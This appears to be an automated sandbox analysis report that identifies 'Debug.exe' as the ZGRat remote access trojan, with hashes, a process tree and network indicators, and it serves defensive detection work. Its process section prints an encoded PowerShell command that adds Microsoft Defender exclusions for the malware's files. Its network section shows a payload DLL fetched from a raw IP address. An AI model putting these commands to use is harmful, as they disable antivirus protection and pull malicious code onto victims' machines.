Overview

overview

10

Static

static

3

Debug.exe

windows7-x64

10

Debug.exe

windows10-2004-x64

10

Resubmissions

03/01/2024, 11:37 UTC

240103-nrgycafdf4 10

03/01/2024, 11:18 UTC

240103-nd9q7scgfm 10

Analysis

  • max time kernel
    153s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    03/01/2024, 11:18 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Debug.exe

  • Size

    631KB

  • MD5

    eec03d362a4c66fe6ac8064ae68bda50

  • SHA1

    8aa051b9c7f201eb9504fb7023bbc5ffa2458293

  • SHA256

    cd2cc1403cb829e7d7454a3a80d9875834bd3b0837e56493369f2d842bf3f569

  • SHA512

    e6f07b5171fee9fa534f57376aaf6061e541da4ad9cee2e50b3d2ee3eed7cd2d0ed2942a479e8887dc7e4247e969b081b5ebef758854e7c62be35e2af49a8f2d

  • SSDEEP

    12288:vEZR29MfzdOwMI5F09MyMeWR+KSS2g/Pd35/K9TGH4CaxJDua:MZR29Mfzdu6LyZTIdJ/K98n6u

Score
10/10
zgratrat

Malware Config

Signatures

  • Detect ZGRat V1 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Debug.exe
    "C:\Users\Admin\AppData\Local\Temp\Debug.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1984
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {8D3E31BC-6026-4F0D-AC2A-E1867819FB44} S-1-5-21-452311807-3713411997-1028535425-1000:OZEMQECW\Admin:S4U:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2948
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABlAGYAYQB1AGwAdABcAE4AYQBtAGUALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEQAZQBmAGEAdQBsAHQAXABOAGEAbQBlAC4AZQB4AGUA
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2868
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {9A760D98-360A-44D8-BA0F-A67F04D5E1AE} S-1-5-21-452311807-3713411997-1028535425-1000:OZEMQECW\Admin:Interactive:[1]
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1256
    • C:\Users\Admin\AppData\Roaming\Default\Name.exe
      C:\Users\Admin\AppData\Roaming\Default\Name.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1360
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3068

Network

  • flag-bg
    GET
    http://91.92.246.154/plugin3.dll
    RegAsm.exe
    Remote address:
    91.92.246.154:80
    Request
    GET /plugin3.dll HTTP/1.1
    Host: 91.92.246.154
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Wed, 03 Jan 2024 11:19:36 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
    Last-Modified: Fri, 15 Dec 2023 15:11:23 GMT
    ETag: "23f2d8-60c8dd03f4af7"
    Accept-Ranges: bytes
    Content-Length: 2355928
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdownload
  • 91.92.246.154:39001
    RegAsm.exe
    496 B
     680 B
     8
    6
  • 91.92.246.154:80
    http://91.92.246.154/plugin3.dll
    http
    RegAsm.exe
    50.6kB
     2.5MB
     1070
    1775

    HTTP Request

    GET http://91.92.246.154/plugin3.dll

    HTTP Response

    200
No results found

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Roaming\Default\Name.exe
    Filesize

    631KB

    MD5

    eec03d362a4c66fe6ac8064ae68bda50

    SHA1

    8aa051b9c7f201eb9504fb7023bbc5ffa2458293

    SHA256

    cd2cc1403cb829e7d7454a3a80d9875834bd3b0837e56493369f2d842bf3f569

    SHA512

    e6f07b5171fee9fa534f57376aaf6061e541da4ad9cee2e50b3d2ee3eed7cd2d0ed2942a479e8887dc7e4247e969b081b5ebef758854e7c62be35e2af49a8f2d

    Download Submit

  • memory/1360-29-0x000007FEF50C0000-0x000007FEF5AAC000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/1360-38-0x000000001BB70000-0x000000001BBF0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1360-28-0x000000013F9A0000-0x000000013FA42000-memory.dmp

    Filesize

    648KB

    Download

  • memory/1360-33-0x000000001BB70000-0x000000001BBF0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1360-41-0x000007FEF50C0000-0x000007FEF5AAC000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/1360-30-0x000000001BB70000-0x000000001BBF0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1984-2-0x000000001B1E0000-0x000000001B260000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1984-6-0x000000001B100000-0x000000001B154000-memory.dmp

    Filesize

    336KB

    Download

  • memory/1984-5-0x00000000024A0000-0x00000000024EC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1984-0-0x000000013F0B0000-0x000000013F152000-memory.dmp

    Filesize

    648KB

    Download

  • memory/1984-4-0x00000000022C0000-0x0000000002316000-memory.dmp

    Filesize

    344KB

    Download

  • memory/1984-22-0x000007FEF5AB0000-0x000007FEF649C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/1984-3-0x00000000023A0000-0x00000000024A2000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/1984-1-0x000007FEF5AB0000-0x000007FEF649C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/1984-23-0x000007FEF5AB0000-0x000007FEF649C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2868-14-0x0000000001430000-0x00000000014B0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2868-19-0x000007FEEF600000-0x000007FEEFF9D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2868-18-0x0000000001430000-0x00000000014B0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2868-16-0x0000000001430000-0x00000000014B0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2868-17-0x0000000001430000-0x00000000014B0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2868-15-0x000007FEEF600000-0x000007FEEFF9D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2868-11-0x0000000019E60000-0x000000001A142000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2868-13-0x000007FEEF600000-0x000007FEEFF9D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2868-12-0x0000000001100000-0x0000000001108000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3068-37-0x0000000140000000-0x00000001400A2000-memory.dmp

    Filesize

    648KB

    Download

  • memory/3068-44-0x0000000000140000-0x00000000001C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/3068-34-0x0000000140000000-0x00000001400A2000-memory.dmp

    Filesize

    648KB

    Download

  • memory/3068-32-0x0000000140000000-0x00000001400A2000-memory.dmp

    Filesize

    648KB

    Download

  • memory/3068-31-0x0000000140000000-0x00000001400A2000-memory.dmp

    Filesize

    648KB

    Download

  • memory/3068-42-0x000007FEF50C0000-0x000007FEF5AAC000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/3068-43-0x0000000000140000-0x00000000001C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/3068-35-0x000007FFFFFD4000-0x000007FFFFFD5000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3068-45-0x0000000000140000-0x00000000001C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/3068-46-0x0000000000140000-0x00000000001C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/3068-47-0x000007FEF50C0000-0x000007FEF5AAC000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/3068-48-0x0000000000140000-0x00000000001C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/3068-49-0x0000000000140000-0x00000000001C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/3068-50-0x0000000000140000-0x00000000001C0000-memory.dmp

    Filesize

    512KB

    Download

  • memory/3068-51-0x0000000000140000-0x00000000001C0000-memory.dmp

    Filesize

    512KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.